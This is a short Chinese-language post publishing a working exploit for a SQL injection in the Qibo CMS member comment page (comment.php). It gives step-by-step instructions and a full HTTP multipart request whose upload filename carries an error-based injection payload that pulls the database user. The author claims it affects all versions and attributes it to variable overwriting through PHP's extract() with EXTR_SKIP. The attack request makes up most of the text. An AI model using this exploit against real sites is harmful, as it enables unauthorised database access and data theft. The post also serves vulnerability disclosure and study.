漏洞的具體分析在
http://security.alibaba.com/blog/blog.htm?spm=0.0.0.0.AooULy&id=13,下面公佈一下我寫的漏洞利用以及exp。
利用步驟如下:
(1)首先訪問/member下面的“評論管理”功能,抓包
(2)在http request中構造一個attachment,如下:
POST /qibo/member/comment.php?job=yz&yz=0 HTTP/1.1
Host: 127.0.0.1
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36 SE 2.X MetaSr 1.0
Referer: http://127.0.0.1/qibo/member/comment.php?job=work
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=jo9rpav7l51iakidv01vr9fem1;
passport=1%09admin%09ClAKVgsEBglUAwcFUgRTDgRRCF9XUAZXBAcAVQIHBlc%3D94606de1fd; USR=fvqnvbj3%0922%091425969668%09http%3A%2F%2F127.0.0.1%2Fqibo%2Fmember%2Fcomment.php%3Fjob%3Dwork
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundary6ukpBHoIrpHKtOkl
Content-Length: 227
------WebKitFormBoundary6ukpBHoIrpHKtOkl
Content-Disposition: form-data; name="cidDB"; filename="1' and EXP(~(select * from(select user())a)) -- "
Content-Type: text/plain
1111
------WebKitFormBoundary6ukpBHoIrpHKtOkl--
注意將原來的URL上的cidDB[]=x刪除掉;
然後構造一個文件上傳的報文(GET改爲POST方法);
在filename處填入注入的payload。
(3)提交該數據包,即可注入成功。
目測是全版本通殺的,這次的變量覆蓋是抓住了extract的EXTR_SKIP只檢查已經存在的變量,但是有些沒有聲明的變量還是會被覆蓋。